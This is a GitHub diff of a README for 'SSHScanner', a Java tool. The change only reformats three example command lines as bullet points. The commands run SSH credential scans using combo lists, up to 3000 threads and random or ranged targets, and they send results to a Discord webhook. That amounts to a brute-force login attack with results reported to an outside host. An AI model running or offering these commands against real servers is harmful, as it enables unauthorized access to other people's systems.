File tree Expand file tree Collapse file tree 1 file changed +3
-3
lines changed
Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -30,9 +30,9 @@ You can reuse SSHScanner but make sure you comply with the [LICENSE](https://git
3030
3131* Here are some examples of commands according to your need*
3232
33- ** Scan random SSH servers :** java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y " -verbose true
34- ** Scan SSH range :** java -jar SSHScanner.jar -range range.txt -combo combo.txt -threads 3000 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y " -verbose false
35- ** Scan specific SSH server :** java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y " -verbose true -host "127.0.0.1"
33+ - ** Scan random SSH servers :** java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y " -verbose true
34+ - ** Scan SSH range :** java -jar SSHScanner.jar -range range.txt -combo combo.txt -threads 3000 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y " -verbose false
35+ - ** Scan specific SSH server :** java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y " -verbose true -host "127.0.0.1"
3636
3737
3838## Arguments
You can’t perform that action at this time.
0 commit comments